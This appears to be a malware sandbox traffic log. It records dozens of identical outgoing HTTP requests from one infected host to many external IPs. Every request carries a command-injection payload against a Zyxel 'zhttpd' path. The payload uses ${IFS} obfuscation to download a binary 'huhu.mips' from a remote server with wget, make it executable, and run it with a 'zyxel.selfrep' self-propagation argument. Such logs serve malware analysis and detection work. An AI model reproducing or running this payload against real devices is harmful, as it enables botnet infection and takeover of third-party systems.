                                            Feb 2, 2024 06:21:14.658885956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4762192.168.2.1547420198.87.186.164443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.658912897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4763192.168.2.1537878143.249.82.46443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.658936977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4764192.168.2.1549788169.214.70.110443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.658977032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4765192.168.2.154542032.168.68.209443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.659010887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4766192.168.2.154847818.14.75.106443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.659048080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4767192.168.2.1543078136.174.214.38443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.659080982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4768192.168.2.155661675.61.25.89443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.659121037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4769192.168.2.1542500187.47.76.245443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.659149885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4770192.168.2.15551068.156.254.220443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.659178972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4771192.168.2.1549328103.214.175.102443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.659208059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4772192.168.2.1555302202.2.139.206443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.659265041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4773192.168.2.154662413.177.73.245443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.659274101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4774192.168.2.1560492207.219.239.167443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.659301043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4775192.168.2.1557478147.213.21.107443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.659332037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4776192.168.2.1542794133.75.170.232443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.659373999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4777192.168.2.154206879.110.45.76443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.659424067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4778192.168.2.1558524195.243.1.185443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.659446955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4779192.168.2.1551552216.50.234.202443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.659492970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4780192.168.2.155416860.176.177.20443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.659524918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4781192.168.2.1546230212.45.128.177443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.659567118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4782192.168.2.1535326133.28.136.130443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.659596920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4783192.168.2.1550818190.60.111.103443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.659653902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4784192.168.2.153789099.15.203.23443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.659686089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4785192.168.2.154085419.5.88.193443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.659746885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4786192.168.2.1539946165.108.227.115443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.659797907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4787192.168.2.1553806157.6.39.207443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.659828901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4788192.168.2.1552724119.207.14.110443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.659873009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4789192.168.2.1547548102.210.246.231443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.659904957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4790192.168.2.155041260.65.16.241443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.659951925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4791192.168.2.1545360144.169.192.30443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.659981966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4792192.168.2.1537688115.78.57.63443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.660007000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4793192.168.2.156021435.199.54.87443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.660056114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4794192.168.2.1560552165.51.235.122443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.660093069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4795192.168.2.154406061.198.224.239443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.660109997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4796192.168.2.155856844.208.161.133443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.660166025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4797192.168.2.1558612159.170.253.77443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.660202980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4798192.168.2.155084632.243.171.134443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.660254955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4799192.168.2.1540478131.4.41.223443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.660298109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4800192.168.2.1558538101.245.34.168443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.660326004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4801192.168.2.155843878.71.16.124443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.660371065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4802192.168.2.1540440126.111.14.121443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.660417080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4803192.168.2.1541724110.117.102.43443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.660445929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4804192.168.2.154128652.38.213.180443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.660478115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4805192.168.2.153653420.4.230.142443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.660526037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4806192.168.2.1538842139.240.9.94443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.660562038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4807192.168.2.1534926155.73.77.127443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.660603046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4808192.168.2.154558081.64.152.236443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.660638094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4809192.168.2.1555548191.213.227.31443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.660670042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4810192.168.2.1533762157.244.8.201443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.660697937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4811192.168.2.1545726173.88.209.79443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.660736084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4812192.168.2.154674649.11.27.133443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.660758018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4813192.168.2.1533428146.254.13.201443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.660799980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4814192.168.2.155783893.170.15.149443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.660850048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4815192.168.2.1547766107.3.53.71443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.660880089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4816192.168.2.153977652.98.180.165443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.660918951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4817192.168.2.1548798188.0.17.83443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.660964012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4818192.168.2.1556548168.78.168.183443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.660989046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4819192.168.2.1554458154.135.85.9443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.661029100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4820192.168.2.153680287.142.52.22443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.661050081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4821192.168.2.154254099.146.45.255443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.661096096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4822192.168.2.154248094.222.246.105443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.661123037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4823192.168.2.1554430142.103.210.51443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.661145926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4824192.168.2.1546322111.12.95.11443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.661209106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4825192.168.2.1553286105.117.97.30443
                                            TimestampBytes transferredDirectionData
